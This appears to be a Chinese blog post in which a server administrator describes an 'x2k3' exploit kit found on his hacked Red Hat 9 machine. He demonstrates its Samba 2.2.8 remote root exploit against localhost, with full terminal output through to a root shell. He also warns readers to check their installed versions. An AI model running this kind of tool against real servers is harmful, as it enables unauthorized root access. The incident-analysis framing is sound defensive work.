从近日对被黑服务器的安全分析来看，我找到该用户提升权限的工具。他是利用了Samba的安全漏洞提升为了ROOT。

这几天服务器因为要放到公网测试，此时又安装了Samba服务器。结果第二天就发现了服务器被黑

Samba是在RedhatLinux9上默认的版本。使用了该黑客的强大的exploit工具提升为了root。

提升为root，只需要短短的3秒钟

自己汗一个

从服务器的tmp查找到一个x2k3的目录

[bob@learnin9tmp]$cdx2k3/

[bob@learnin9x2k3]$ls

bindftpgkridentdr00tsamba

[bob@learnin9x2k3]$

bindftpgkridentdsamba均为目录，r00t为一个程序，让我们来看看r00t程序的执行情况

[bob@learnin9x2k3]$./r00t

.--------------------------------.

|x2k3/

|WrittenbyNatok/

+------------------------+----.

|Targets:[1]Samba|<=2.2.8

|[2]Bind|8.3.2/8.3.3/9.2.1

|[3]gkrellmd|<2.1.12

|[4]wu_ftpd|<=2.6.1

|[5]identd|1.2

+------------------------+----.

|http://www.natok.de/

|____________________________/

./r00t

[bob@learnin9x2k3]$./r00t127.0.0.11

[*]Rangetoscan:127.0.0.0

[*]SocketConnectingtoport:139

[*]Presscontrol+cforskipping!

Port139IP127.0.0.0->Connectionrefused!

Port139IP127.0.0.1->Connectionok!

[+]Let'ssploit;-)

samba-2.2.8<remoterootexploitbyeSDee(www.netric.org|be)

--------------------------------------------------------------

+Verbosemode.

+Bruteforcemode.(Linux)

+Hostisrunningsamba.

+Usingret:[0xbffffed4]

+Usingret:[0xbffffda8]

+Usingret:[0xbffffc7c]

+Usingret:[0xbffffb50]

+Usingret:[0xbffffa24]

+Usingret:[0xbffff8f8]

+Usingret:[0xbffff7cc]

+Usingret:[0xbffff6a0]

+Usingret:[0xbffff574]

+Usingret:[0xbffff448]

+Usingret:[0xbffff31c]

+Usingret:[0xbffff1f0]

+Usingret:[0xbffff0c4]

+Usingret:[0xbfffef98]

+Usingret:[0xbfffee6c]

+Usingret:[0xbfffed40]

+Usingret:[0xbfffec14]

+Usingret:[0xbfffeae8]

+Usingret:[0xbfffe9bc]

+Usingret:[0xbfffe890]

+Usingret:[0xbfffe764]

+Usingret:[0xbfffe638]

+Usingret:[0xbfffe50c]

+Usingret:[0xbfffe3e0]

+Usingret:[0xbfffe2b4]

+Usingret:[0xbfffe188]

+Worked!

--------------------------------------------------------------

***JEMOETJEMUILHOUWE

Linuxlearnin92.4.20-8#1ThuMar1317:54:28EST2003i686i686i386GNU/Linux

uid=0(root)gid=0(root)groups=99(nobody)

id

uid=0(root)gid=0(root)groups=99(nobody)

看到了吧。就这么轻易的被夺取为root了。

我这只是localhost方式，其实远程也是一样的直接获取为root了。

请各位好好看看自己的Redhat9吧。rpm-qa|grep*****是不是汗已经出来了？

还有bindgkrellmdwu_ftpdidentd这些溢出程序。我不知道这些程序是否就是属于黑客界一些没有公布出来的溢出程序。呵呵！

我的服务器因为没有启动Bind、gkrellmd、wu_ftpd、identd，只启动了默认安装的samba，而且还是在公网上，所以那个黑客就中奖入侵到我的服务器了。可喜可贺，我也是终于找到了这么好的工具。

自己欢喜一下。去看了一下http://www.natok.de/居然发现是中文的网站，究竟里面是谁？很好奇.........

可以说，r00t程序是Natok写的，但是exploit程序不是他写的，他只是将其它的溢出程序分门别类的。做了个友好的界面，不过能搜集到还是很强的。

希望能结识到这个家伙！

【默认Samba版本在RedHat 9上的溢出获取root演示】相关文章：

★ 养在深闺人未识：FU_Rootkit

★ 教你利用Log备份获取Webshell

★ UPDATE注射(mysql+php)的两个模式

★ 一个简单的花指令伪装器-Delphi版木马彩衣

★ 卡巴斯基(AVP)内存驻留型病毒检测方法

★ O-blog漏洞暴光

★ 特络伊木马如何利用文件关联和设置名

★ MSIE DHTML Edit跨站脚本漏洞

★ COCOON Counter统计程序后台写马

★ Windows家族内部各个安全漏洞集体大搜捕(图)